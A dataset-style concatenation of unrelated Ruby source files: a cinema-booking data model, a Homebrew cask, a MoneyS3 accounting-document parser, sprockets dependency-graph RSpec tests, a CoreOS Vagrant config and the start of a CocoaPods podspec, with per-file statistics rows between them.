    one_to_one :login_name, class: Name         # Person has login-Name, see Name#person_as_login_name
  end
  class FilmID < AutoCounter
    value_type
  end
  class YearNr < SignedInteger
    value_type length: 32
  end
  class Year
    identified_by :year_nr
    one_to_one :year_nr, mandatory: true        # Year has Year Nr, see YearNr#year
  end
  class Film
    identified_by :film_id
    one_to_one :film_id, mandatory: true, class: FilmID  # Film has Film ID, see FilmID#film_as_film_id
    has_one :name, mandatory: true              # Film has Name, see Name#all_film
    has_one :year                               # Film was made in Year, see Year#all_film
  end
  # Calendar/time value types used to identify a session's start moment.
  class Day < SignedInteger
    value_type length: 32
  end
  class Hour < SignedInteger
    value_type length: 32
  end
  class Minute < SignedInteger
    value_type length: 32
  end
  class MonthNr < SignedInteger
    value_type length: 32
  end
  class Month
    identified_by :month_nr
    one_to_one :month_nr, mandatory: true       # Month has Month Nr, see MonthNr#month
  end
  class SessionTime
    identified_by :year, :month, :day, :hour, :minute
    has_one :year, mandatory: true              # Session Time is in Year, see Year#all_session_time
    has_one :month, mandatory: true             # Session Time is in Month, see Month#all_session_time
    has_one :day, mandatory: true               # Session Time is on Day, see Day#all_session_time
    has_one :hour, mandatory: true              # Session Time is at Hour, see Hour#all_session_time
    has_one :minute, mandatory: true            # Session Time is at Minute, see Minute#all_session_time
  end
  class Session
    identified_by :cinema, :session_time
    has_one :cinema, mandatory: true            # Session involves Cinema, see Cinema#all_session
    has_one :session_time, mandatory: true      # Session involves Session Time, see SessionTime#all_session
    maybe :is_high_demand                       # Is High Demand
    maybe :uses_allocated_seating               # Uses Allocated Seating
    has_one :film, mandatory: true              # Session involves Film, see Film#all_session
  end
  class Booking
    identified_by :booking_nr
    one_to_one :booking_nr, mandatory: true     # Booking has Booking Nr, see BookingNr#booking
    maybe :tickets_for_booking_have_been_issued  # Tickets For Booking Have Been Issued
    has_one :number, mandatory: true            # Booking involves Number, see Number#all_booking
    has_one :person, mandatory: true            # Booking involves Person, see Person#all_booking
    has_one :session, mandatory: true           # Booking involves Session, see Session#all_booking
    has_one :address                            # tickets for Booking are being mailed to Address, see Address#all_booking
    has_one :collection_code                    # Booking has Collection Code, see CollectionCode#all_booking
    has_one :section                            # Booking is for seats in Section, see Section#all_booking
  end
  class HighDemand < Boolean
    value_type
  end
  class PaymentMethodCode < String
    value_type
  end
  class PaymentMethod
    identified_by :payment_method_code
    one_to_one :payment_method_code, mandatory: true  # Payment Method has Payment Method Code, see PaymentMethodCode#payment_method
  end
  class PlacesPaid
    identified_by :booking, :payment_method
    has_one :booking, mandatory: true           # Places Paid involves Booking, see Booking#all_places_paid
    has_one :payment_method, mandatory: true    # Places Paid involves Payment Method, see PaymentMethod#all_places_paid
    has_one :number, mandatory: true            # Places Paid involves Number, see Number#all_places_paid
  end
  class Price < Money
    value_type
  end
  class RowNr < Char
    value_type length: 2
  end
  class Row
    identified_by :cinema, :row_nr
    has_one :cinema, mandatory: true            # Row is in Cinema, see Cinema#all_row
    has_one :row_nr, mandatory: true            # Row has Row Nr, see RowNr#all_row
  end
  class SeatNumber < UnsignedInteger
    value_type length: 16
  end
  class Seat
    identified_by :row, :seat_number
    has_one :row, mandatory: true               # Seat is in Row, see Row#all_seat
    has_one :seat_number, mandatory: true       # Seat has Seat Number, see SeatNumber#all_seat
    has_one :section                            # Seat is in Section, see Section#all_seat
  end
  class SeatAllocation
    identified_by :booking, :allocated_seat
    has_one :booking, mandatory: true           # Seat Allocation involves Booking, see Booking#all_seat_allocation
    has_one :allocated_seat, mandatory: true, class: Seat  # Seat Allocation involves allocated-Seat, see Seat#all_seat_allocation_as_allocated_seat
  end
  class TicketPricing
    identified_by :session_time, :cinema, :section, :high_demand
    has_one :session_time, mandatory: true      # Ticket Pricing involves Session Time, see SessionTime#all_ticket_pricing
    has_one :cinema, mandatory: true            # Ticket Pricing involves Cinema, see Cinema#all_ticket_pricing
    has_one :section, mandatory: true           # Ticket Pricing involves Section, see Section#all_ticket_pricing
    has_one :high_demand, mandatory: true       # Ticket Pricing involves High Demand, see HighDemand#all_ticket_pricing
    has_one :price, mandatory: true             # Ticket Pricing involves Price, see Price#all_ticket_pricing
  end
end
| 38.435 | 156 | 0.661767 |
1c9b7cb41c2adff92c8675d8a109bcec5edea216 | 72 | class Crypto::AlertSubscription < Common::AlertSubscriptionNotifier
end
| 24 | 67 | 0.861111 |
08592d0d4788f907a89d6a4673d1bb07b96c6355 | 41 | include_recipe 'role-balanced-commander'
| 20.5 | 40 | 0.853659 |
f79c29513d36adb28175399c7185f8f620b3742b | 435 | cask "4k-stogram" do
version "3.0.7.3300"
sha256 "4bfb52578517e40a2176a7666b05dd32d2baf35af8e41800380469b9b139415f"
url "https://dl.4kdownload.com/app/4kstogram_#{version.major_minor_patch}.dmg"
appcast "https://www.4kdownload.com/download"
name "4K Stogram"
homepage "https://www.4kdownload.com/products/product-stogram"
depends_on macos: ">= :sierra"
app "4K Stogram.app"
zap trash: "~/Pictures/4K Stogram"
end
| 27.1875 | 80 | 0.749425 |
ab7e1d81fff2fdb2ee0de39378dd78f393ac5cf0 | 111 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "panos/phpipam"
require "minitest/autorun"
| 22.2 | 58 | 0.747748 |
e836e1a4cb351241bfd7e34069ece760c16427e3 | 160 | module Tak
class Game
def initialize(size)
@tak_board = Tak::Board.new(size)
@turn = :white
@first_move = true
end
end
end
| 16 | 40 | 0.56875 |
f773520248a65e0274cefc6b4ce487e3aa54988b | 1,626 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2019_01_01
module Models
#
# Sampling settings for Diagnostic.
#
class SamplingSettings
include MsRestAzure
# @return [SamplingType] Sampling type. Possible values include: 'fixed'
attr_accessor :sampling_type
# @return [Float] Rate of sampling for fixed-rate sampling.
attr_accessor :percentage
#
# Mapper for SamplingSettings class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'SamplingSettings',
type: {
name: 'Composite',
class_name: 'SamplingSettings',
model_properties: {
sampling_type: {
client_side_validation: true,
required: false,
serialized_name: 'samplingType',
type: {
name: 'String'
}
},
percentage: {
client_side_validation: true,
required: false,
serialized_name: 'percentage',
constraints: {
InclusiveMaximum: 100,
InclusiveMinimum: 0
},
type: {
name: 'Double'
}
}
}
}
}
end
end
end
end
| 26.655738 | 78 | 0.52214 |
f7c2354ac11e2fe78690ce01ef8d5d4a1ae16fdd | 10,265 | module MoneyS3
module Parsers
class BanDoklType
include ParserCore::BaseParser
def vydej
at 'Vydej'
end
def vydej_attributes
attributes_at 'Vydej'
end
def doklad
at 'Doklad'
end
def doklad_attributes
attributes_at 'Doklad'
end
def ev_cis_dokl
at 'EvCisDokl'
end
def ev_cis_dokl_attributes
attributes_at 'EvCisDokl'
end
def zpusob_uctovani
at 'ZpusobUctovani'
end
def zpusob_uctovani_attributes
attributes_at 'ZpusobUctovani'
end
def storno
at 'Storno'
end
def storno_attributes
attributes_at 'Storno'
end
def del
at 'Del'
end
def del_attributes
attributes_at 'Del'
end
def popis
at 'Popis'
end
def popis_attributes
attributes_at 'Popis'
end
def dat_uc_pr
at 'DatUcPr'
end
def dat_uc_pr_attributes
attributes_at 'DatUcPr'
end
def dat_vyst
at 'DatVyst'
end
def dat_vyst_attributes
attributes_at 'DatVyst'
end
def dat_plat
at 'DatPlat'
end
def dat_plat_attributes
attributes_at 'DatPlat'
end
def dat_pln
at 'DatPln'
end
def dat_pln_attributes
attributes_at 'DatPln'
end
def dat_upl_dph
at 'DatUplDPH'
end
def dat_upl_dph_attributes
attributes_at 'DatUplDPH'
end
def vypis
at 'Vypis'
end
def vypis_attributes
attributes_at 'Vypis'
end
def id_polozky
at 'IDPolozky'
end
def id_polozky_attributes
attributes_at 'IDPolozky'
end
def ad_ucet
at 'AdUcet'
end
def ad_ucet_attributes
attributes_at 'AdUcet'
end
def ad_kod
at 'AdKod'
end
def ad_kod_attributes
attributes_at 'AdKod'
end
def prijat_dokl
at 'PrijatDokl'
end
def prijat_dokl_attributes
attributes_at 'PrijatDokl'
end
def var_sym
at 'VarSym'
end
def var_sym_attributes
attributes_at 'VarSym'
end
def par_sym
at 'ParSym'
end
def par_sym_attributes
attributes_at 'ParSym'
end
def kon_sym
at 'KonSym'
end
def kon_sym_attributes
attributes_at 'KonSym'
end
def spec_sym
at 'SpecSym'
end
def spec_sym_attributes
attributes_at 'SpecSym'
end
def adresa
submodel_at(DokladFirmaType, 'Adresa')
end
def pr_kont
at 'PrKont'
end
def pr_kont_attributes
attributes_at 'PrKont'
end
def cleneni
at 'Cleneni'
end
def cleneni_attributes
attributes_at 'Cleneni'
end
def stred
at 'Stred'
end
def stred_attributes
attributes_at 'Stred'
end
def zakazka
at 'Zakazka'
end
def zakazka_attributes
attributes_at 'Zakazka'
end
def cinnost
at 'Cinnost'
end
def cinnost_attributes
attributes_at 'Cinnost'
end
def stat_moss
at 'StatMOSS'
end
def stat_moss_attributes
attributes_at 'StatMOSS'
end
def zp_vyp_dph
at 'ZpVypDPH'
end
def zp_vyp_dph_attributes
attributes_at 'ZpVypDPH'
end
def s_sazba
at 'SSazba'
end
def s_sazba_attributes
attributes_at 'SSazba'
end
def z_sazba
at 'ZSazba'
end
def z_sazba_attributes
attributes_at 'ZSazba'
end
def souhrn_dph
submodel_at(SouhrnDPHType, 'SouhrnDPH')
end
def celkem
at 'Celkem'
end
def celkem_attributes
attributes_at 'Celkem'
end
def valuty
submodel_at(Valuty2, 'Valuty')
end
def pozn
at 'Pozn'
end
def pozn_attributes
attributes_at 'Pozn'
end
def d_rada
at 'DRada'
end
def d_rada_attributes
attributes_at 'DRada'
end
def d_cislo
at 'DCislo'
end
def d_cislo_attributes
attributes_at 'DCislo'
end
def vyst
at 'Vyst'
end
def vyst_attributes
attributes_at 'Vyst'
end
def typ_dokl
at 'TypDokl'
end
def typ_dokl_attributes
attributes_at 'TypDokl'
end
def ucet
submodel_at(Ucet, 'Ucet')
end
def seznam_norm_polozek
array_of_at(NormPolozUDType, ['SeznamNormPolozek', 'NormPolozka'])
end
def seznam_rozuct_polozek
array_of_at(RozuctPolozUDType, ['SeznamRozuctPolozek', 'RozuctPolozka'])
end
def vlajky
submodel_at(Vlajky, 'Vlajky')
end
def dokumenty
array_of_at(String, ['Dokumenty', 'Dokument'])
end
def to_h
hash = {}
hash[:attributes] = attributes
hash[:vydej] = vydej if has? 'Vydej'
hash[:vydej_attributes] = vydej_attributes if has? 'Vydej'
hash[:doklad] = doklad if has? 'Doklad'
hash[:doklad_attributes] = doklad_attributes if has? 'Doklad'
hash[:ev_cis_dokl] = ev_cis_dokl if has? 'EvCisDokl'
hash[:ev_cis_dokl_attributes] = ev_cis_dokl_attributes if has? 'EvCisDokl'
hash[:zpusob_uctovani] = zpusob_uctovani if has? 'ZpusobUctovani'
hash[:zpusob_uctovani_attributes] = zpusob_uctovani_attributes if has? 'ZpusobUctovani'
hash[:storno] = storno if has? 'Storno'
hash[:storno_attributes] = storno_attributes if has? 'Storno'
hash[:del] = del if has? 'Del'
hash[:del_attributes] = del_attributes if has? 'Del'
hash[:popis] = popis if has? 'Popis'
hash[:popis_attributes] = popis_attributes if has? 'Popis'
hash[:dat_uc_pr] = dat_uc_pr if has? 'DatUcPr'
hash[:dat_uc_pr_attributes] = dat_uc_pr_attributes if has? 'DatUcPr'
hash[:dat_vyst] = dat_vyst if has? 'DatVyst'
hash[:dat_vyst_attributes] = dat_vyst_attributes if has? 'DatVyst'
hash[:dat_plat] = dat_plat if has? 'DatPlat'
hash[:dat_plat_attributes] = dat_plat_attributes if has? 'DatPlat'
hash[:dat_pln] = dat_pln if has? 'DatPln'
hash[:dat_pln_attributes] = dat_pln_attributes if has? 'DatPln'
hash[:dat_upl_dph] = dat_upl_dph if has? 'DatUplDPH'
hash[:dat_upl_dph_attributes] = dat_upl_dph_attributes if has? 'DatUplDPH'
hash[:vypis] = vypis if has? 'Vypis'
hash[:vypis_attributes] = vypis_attributes if has? 'Vypis'
hash[:id_polozky] = id_polozky if has? 'IDPolozky'
hash[:id_polozky_attributes] = id_polozky_attributes if has? 'IDPolozky'
hash[:ad_ucet] = ad_ucet if has? 'AdUcet'
hash[:ad_ucet_attributes] = ad_ucet_attributes if has? 'AdUcet'
hash[:ad_kod] = ad_kod if has? 'AdKod'
hash[:ad_kod_attributes] = ad_kod_attributes if has? 'AdKod'
hash[:prijat_dokl] = prijat_dokl if has? 'PrijatDokl'
hash[:prijat_dokl_attributes] = prijat_dokl_attributes if has? 'PrijatDokl'
hash[:var_sym] = var_sym if has? 'VarSym'
hash[:var_sym_attributes] = var_sym_attributes if has? 'VarSym'
hash[:par_sym] = par_sym if has? 'ParSym'
hash[:par_sym_attributes] = par_sym_attributes if has? 'ParSym'
hash[:kon_sym] = kon_sym if has? 'KonSym'
hash[:kon_sym_attributes] = kon_sym_attributes if has? 'KonSym'
hash[:spec_sym] = spec_sym if has? 'SpecSym'
hash[:spec_sym_attributes] = spec_sym_attributes if has? 'SpecSym'
hash[:adresa] = adresa.to_h if has? 'Adresa'
hash[:pr_kont] = pr_kont if has? 'PrKont'
hash[:pr_kont_attributes] = pr_kont_attributes if has? 'PrKont'
hash[:cleneni] = cleneni if has? 'Cleneni'
hash[:cleneni_attributes] = cleneni_attributes if has? 'Cleneni'
hash[:stred] = stred if has? 'Stred'
hash[:stred_attributes] = stred_attributes if has? 'Stred'
hash[:zakazka] = zakazka if has? 'Zakazka'
hash[:zakazka_attributes] = zakazka_attributes if has? 'Zakazka'
hash[:cinnost] = cinnost if has? 'Cinnost'
hash[:cinnost_attributes] = cinnost_attributes if has? 'Cinnost'
hash[:stat_moss] = stat_moss if has? 'StatMOSS'
hash[:stat_moss_attributes] = stat_moss_attributes if has? 'StatMOSS'
hash[:zp_vyp_dph] = zp_vyp_dph if has? 'ZpVypDPH'
hash[:zp_vyp_dph_attributes] = zp_vyp_dph_attributes if has? 'ZpVypDPH'
hash[:s_sazba] = s_sazba if has? 'SSazba'
hash[:s_sazba_attributes] = s_sazba_attributes if has? 'SSazba'
hash[:z_sazba] = z_sazba if has? 'ZSazba'
hash[:z_sazba_attributes] = z_sazba_attributes if has? 'ZSazba'
hash[:souhrn_dph] = souhrn_dph.to_h if has? 'SouhrnDPH'
hash[:celkem] = celkem if has? 'Celkem'
hash[:celkem_attributes] = celkem_attributes if has? 'Celkem'
hash[:valuty] = valuty.to_h if has? 'Valuty'
hash[:pozn] = pozn if has? 'Pozn'
hash[:pozn_attributes] = pozn_attributes if has? 'Pozn'
hash[:d_rada] = d_rada if has? 'DRada'
hash[:d_rada_attributes] = d_rada_attributes if has? 'DRada'
hash[:d_cislo] = d_cislo if has? 'DCislo'
hash[:d_cislo_attributes] = d_cislo_attributes if has? 'DCislo'
hash[:vyst] = vyst if has? 'Vyst'
hash[:vyst_attributes] = vyst_attributes if has? 'Vyst'
hash[:typ_dokl] = typ_dokl if has? 'TypDokl'
hash[:typ_dokl_attributes] = typ_dokl_attributes if has? 'TypDokl'
hash[:ucet] = ucet.to_h if has? 'Ucet'
hash[:seznam_norm_polozek] = seznam_norm_polozek.map(&:to_h) if has? 'SeznamNormPolozek'
hash[:seznam_rozuct_polozek] = seznam_rozuct_polozek.map(&:to_h) if has? 'SeznamRozuctPolozek'
hash[:vlajky] = vlajky.to_h if has? 'Vlajky'
hash[:dokumenty] = dokumenty if has? 'Dokumenty'
hash
end
end
end
end | 24.73494 | 102 | 0.604189 |
914726c25e2397a9e5a36361af5747e0b02ee000 | 1,075 | require 'test_helper'
class CassandraObject::CallbacksTest < CassandraObject::TestCase
class TestIssue < CassandraObject::BaseSchemaless
self.column_family = 'Issues'
string :description
%w(before_validation after_validation after_save after_create after_update after_destroy).each do |method|
send(method) do
callback_history << method
end
end
def reset_callback_history
@callback_history = []
end
def callback_history
@callback_history ||= []
end
end
test 'create' do
issue = TestIssue.create
assert_equal ['before_validation', 'after_validation', 'after_save', 'after_create'], issue.callback_history
end
test 'update' do
issue = TestIssue.create
issue.reset_callback_history
issue.update_attribute :description, 'foo'
assert_equal ['after_save', 'after_update'], issue.callback_history
end
test 'destroy' do
issue = TestIssue.create
issue.reset_callback_history
issue.destroy
assert_equal ['after_destroy'], issue.callback_history
end
end
| 22.87234 | 112 | 0.72 |
21c3669979c3581ab1155550af9eca0432c58331 | 581 | # frozen_string_literal: true
# rubocop:disable Graphql/AuthorizeTypes
module Types
class AccessLevelType < Types::BaseObject
graphql_name 'AccessLevel'
description 'Represents the access level of a relationship between a User and object that it is related to'
field :integer_value, GraphQL::INT_TYPE, null: true,
description: 'Integer representation of access level.',
method: :to_i
field :string_value, Types::AccessLevelEnum, null: true,
description: 'String representation of access level.',
method: :to_i
end
end
| 32.277778 | 111 | 0.719449 |
03e84beff27b0b7c9b86a08a9bc5a186c2d66cd9 | 1,251 | module Rediscover
module Frame
class Main < Wx::Frame
include Wx
WINDOW_WIDTH = 600
WINDOW_HEIGHT = 400
def initialize
super(nil, -1, 'Rediscover', DEFAULT_POSITION, Size.new(WINDOW_WIDTH, WINDOW_HEIGHT))
@redis = get_app.redis
@logger = get_app.logger
set_icon(Rediscover::Icon.new('application'))
setup_status_bar
setup_notebook
show
end
def setup_notebook
@notebook = Notebook.new(self)
@server_page = Panel::Server.new(@notebook)
@browser_page = Panel::Browser.new(@notebook)
@browser_page.on_status_change { |status| update_status_bar(status) }
@notebook.add_page(@server_page, 'Server Info', false)
@notebook.add_page(@browser_page, 'Key Browser', true)
end
def setup_status_bar
@status_bar = create_status_bar(2)
@status_bar.set_status_widths([-3, -1]) # set fields to variable widths
update_status_bar
end
def update_status_bar(status = nil)
@status_bar.set_status_text(@redis.to_s, 0) # connection info in left field
@status_bar.set_status_text(status, 1) if status # key count in right field
end
end
end
end
| 26.617021 | 93 | 0.644285 |
62b5b2c75606c0f922d960abb1c3df1b78f326eb | 2,614 | # Size of the CoreOS cluster created by Vagrant
$num_instances=1
# Used to fetch a new discovery token for a cluster of size $num_instances
$new_discovery_url="https://discovery.etcd.io/new?size=#{$num_instances}"
# To automatically replace the discovery token on 'vagrant up', uncomment
# the lines below:
#
if File.exists?('user-data') && ARGV[0].eql?('up')
require 'open-uri'
require 'yaml'
token = open($new_discovery_url).read
data = YAML.load(IO.readlines('user-data')[1..-1].join)
if data['coreos'].key? 'etcd'
data['coreos']['etcd']['discovery'] = token
end
yaml = YAML.dump(data)
File.open('user-data', 'w') { |file| file.write("#cloud-config\n\n#{yaml}") }
end
#
# coreos-vagrant is configured through a series of configuration
# options (global ruby variables) which are detailed below. To modify
# these options, first copy this file to "config.rb". Then simply
# uncomment the necessary lines, leaving the $, and replace everything
# after the equals sign..
# Change basename of the VM
# The default value is "core", which results in VMs named starting with
# "core-01" through to "core-${num_instances}".
#$instance_name_prefix="core"
# Official CoreOS channel from which updates should be downloaded
$update_channel='beta'
# Log the serial consoles of CoreOS VMs to log/
# Enable by setting value to true, disable with false
# WARNING: Serial logging is known to result in extremely high CPU usage with
# VirtualBox, so should only be used in debugging situations
#$enable_serial_logging=false
# Enable port forwarding of Docker TCP socket
# Set to the TCP port you want exposed on the *host* machine, default is 2375
# If 2375 is used, Vagrant will auto-increment (e.g. in the case of $num_instances > 1)
# You can then use the docker tool locally by setting the following env var:
# export DOCKER_HOST='tcp://127.0.0.1:2375'
#$expose_docker_tcp=2375
# Enable NFS sharing of your home directory ($HOME) to CoreOS
# It will be mounted at the same path in the VM as on the host.
# Example: /Users/foobar -> /Users/foobar
#$share_home=false
# Customize VMs
$vm_gui = false
$vm_memory = 256
$vm_cpus = 1
# Share additional folders to the CoreOS VMs
# For example,
# $shared_folders = {'/path/on/host' => '/path/on/guest', '/home/foo/app' => '/app'}
# or, to map host folders to guest folders of the same name,
# $shared_folders = Hash[*['/home/foo/app1', '/home/foo/app2'].map{|d| [d, d]}.flatten]
#$shared_folders = {}
# Enable port forwarding from guest(s) to host machine, syntax is: { 80 => 8080 }, auto correction is enabled by default.
#$forwarded_ports = {}
| 35.808219 | 121 | 0.722647 |
f7e316bd21638da56b1a86bd95ce8f4304b201f1 | 15,969 | require_relative 'spec_helper'
require 'sprockets_metadata'
require 'opal/rspec/rake_task'
describe SprocketsMetadata do
describe '::get_dependency_graph' do
include_context :temp_dir
RSpec::Matchers.define :have_graph do |expected|
match do |actual|
actual_keys = actual[:file_mapping].keys
expected_keys = expected[:file_mapping].keys
@matcher = eq(expected_keys)
# Test hash order
next nil unless @matcher.matches? actual_keys
@matcher = eq(expected)
@matcher.matches? actual
end
failure_message do
@matcher.failure_message
end
end
let(:sprockets_env) do
original_env = Opal::RSpec::SprocketsEnvironment.new '**/*.rb',
nil,
nil,
@temp_dir
original_env.add_spec_paths_to_sprockets
original_env.cached
end
subject { SprocketsMetadata.get_dependency_graph sprockets_env, files }
context 'no other dependencies' do
before do
create_dummy_spec_files 'single_file.rb'
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'single_file.js' => absolute_path('single_file.rb')
},
dependencies: {
'single_file.js' => []
})
end
end
context '1 level of 2 dependencies' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => []
})
end
end
context 'nested dependencies' do
before do
create_dummy_spec_files 'single_file.rb', 'level2.rb', 'level3.rb'
File.write absolute_path('single_file.rb'), 'require "level2"'
File.write absolute_path('level2.rb'), 'require "level3"'
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'level3.js' => absolute_path('level3.rb'),
'level2.js' => absolute_path('level2.rb'),
'single_file.js' => absolute_path('single_file.rb')
},
dependencies: {
'single_file.js' => %w(level3.js level2.js),
'level3.js' => [],
'level2.js' => %w(level3.js)
})
end
end
context 'self-referential' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
File.write absolute_path('other_file.rb'), 'require "single_file"'
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => %w(single_file.js)
})
end
end
context 'back reference' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb', 'third_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
File.write absolute_path('third_file.rb'), 'require "single_file"'
end
let(:files) { %w(single_file third_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb'),
'third_file.js' => absolute_path('third_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => [],
'third_file.js' => %w(other_file.js single_file.js)
})
end
end
context 'sprockets style require' do
before do
create_dummy_spec_files 'single_file.js', 'other_file.rb'
File.write absolute_path('single_file.js'), "//\n//= require other_file\n"
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.js')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => []
})
end
end
context 'multiple files' do
context 'shared dependencies' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb', 'third_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
File.write absolute_path('third_file.rb'), 'require "other_file"'
end
let(:files) { %w(single_file third_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb'),
'third_file.js' => absolute_path('third_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => [],
'third_file.js' => %w(other_file.js)
})
end
end
context 'each has different dependencies' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb', 'third_file.rb', 'yet_another_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
File.write absolute_path('third_file.rb'), 'require "yet_another_file"'
end
let(:files) { %w(single_file third_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb'),
'yet_another_file.js' => absolute_path('yet_another_file.rb'),
'third_file.js' => absolute_path('third_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => [],
'third_file.js' => %w(yet_another_file.js),
'yet_another_file.js' => []
})
end
end
end
end
describe '::get_metadata' do
let(:roll_up_list) { [] }
let(:watch) { false }
subject { SprocketsMetadata.get_metadata dependency_graph, roll_up_list, watch }
context 'no dependencies' do
let(:dependency_graph) do
{
file_mapping: {
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => [],
'file2.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: false
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context 'dependencies' do
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file3.rb' => {
logical_path: 'file3.js',
watch: false,
roll_up: false
},
'/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: false
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context 'watches enabled' do
let(:watch) { true }
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file3.rb' => {
logical_path: 'file3.js',
watch: true,
roll_up: false
},
'/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: true,
roll_up: false
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: true,
roll_up: false
})
end
end
context 'roll up enabled' do
let(:roll_up_list) do
%w(file1.rb)
end
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: true
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context 'roll up by regex' do
let(:roll_up_list) do
[/something/]
end
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'something/file1.js' => '/some/dir/something/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'something/file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/something/file1.rb' => {
logical_path: 'something/file1.js',
watch: false,
roll_up: true
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context '2 files both have the same dependency and 1 is rolled up' do
let(:roll_up_list) do
%w(file1.rb)
end
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => ['file3.js'],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: true
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context 'roll up asset comes later in list' do
let(:roll_up_list) do
%w(file1.rb)
end
let(:dependency_graph) do
{
file_mapping: {
'file2.js' => '/some/dir/file2.rb',
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: true
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
end
describe '::default_roll_up_list' do
subject { SprocketsMetadata.default_roll_up_list }
context 'mocked' do
before do
stuff = double
allow(Gem::Specification).to receive(:find_all_by_name).with('opal').and_return([stuff])
allow(stuff).to receive(:gem_dir).and_return('/some/path/to/gems/opal')
end
it { is_expected.to eq [%r{/some/path/to/gems}] }
end
context 'real' do
it { is_expected.to include(be_a(Regexp)) }
end
end
end
| 33.904459 | 107 | 0.416682 |
ab0fab93ade54a2deeed94a7284631bc601ee6fc | 1,768 | # This file specifies the Pod setup for GTMSessionFetcher. It enables developers
# to import GTMSessionFetcher via the CocoaPods dependency Manager.
Pod::Spec.new do |s|
s.name = 'GTMSessionFetcher'
s.version = '1.6.1'
s.authors = 'Google Inc.'
s.license = { :type => 'Apache', :file => 'LICENSE' }
s.homepage = 'https://github.com/google/gtm-session-fetcher'
s.source = { :git => 'https://github.com/google/gtm-session-fetcher.git',
:tag => "v#{s.version}" }
s.summary = 'Google Toolbox for Mac - Session Fetcher'
s.description = <<-DESC
